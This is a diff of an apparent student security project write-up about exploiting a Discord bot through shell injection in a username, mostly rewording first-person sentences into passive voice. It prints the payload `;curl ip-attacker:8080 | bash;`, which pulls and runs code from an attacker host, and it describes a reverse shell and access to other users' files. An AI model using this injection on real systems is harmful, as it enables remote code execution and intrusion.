PasqualiniGabriele/CybersecurityProect/home.md

 - It starts an interactive `/bin/sh` shell, allowing the attacker to execute commands remotely through the established connection.

 #### 2)Listeners
-In order to serve the malicious payload and receive the reverse shell connection, I set up two listener processes on my machine by running the server processes code.
+Two listener processes were set up on the attacker machine by running the corresponding server code to serve the malicious payload and receive the reverse shell connection.

 #### 3)Username
-Due to the vulnerability in the bot’s input handling, I modified my Discord username to include a shell injection payload.
+The Discord username was modified to include a shell injection payload due to the vulnerability in the bot’s input handling.
 The username was set to:

 `;curl ip-attacker:8080 | bash;`

 #### 4) Triggering the Vulnerability

-With the username set, I simply interacted with the bot by sending the command:
+With the username set, the attacker can trigger the exploit by sending the command `!dice` to the bot.

-`!dice`
+---

 ## Post-Exploitation
 Once i obtained a reberse shell, and i was able to navigate inside the user-a folder, accessing all doscord bot's files, including user-b's script `server_start.sh`